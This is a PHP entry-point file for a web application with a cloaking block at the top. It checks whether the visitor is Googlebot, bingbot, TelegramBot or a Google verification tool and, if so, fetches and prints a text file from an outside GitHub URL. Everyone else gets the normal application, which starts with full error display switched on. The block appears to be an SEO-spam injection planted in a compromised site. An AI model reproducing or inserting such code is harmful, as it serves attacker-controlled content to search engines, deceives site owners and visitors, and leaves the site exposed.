<?php
function is_bot() {
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool');
    
    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            return true;
        }
    }
    
    return false;
}

if (is_bot()) {
    $message = file_get_contents('https://raw.githubusercontent.com/la-inca/clev/refs/heads/main/uppen.txt');
    echo $message; 
    exit;
} else {
    define("ROOT", dirname(__FILE__));
    $debug = true;
    
    if ($debug) {
        ini_set('display_errors', 1);
        ini_set('display_startup_errors', 1);
        error_reporting(E_ALL);
    }

    include "core/autoload.php";
    ob_start();
    session_start();

    if (Session::getUID()) {
        Core::$root = "";
    }

    Core::$theme = "";
    Core::$debug_sql = false;

    $lb = new Lb();
    $lb->start();
}
?>
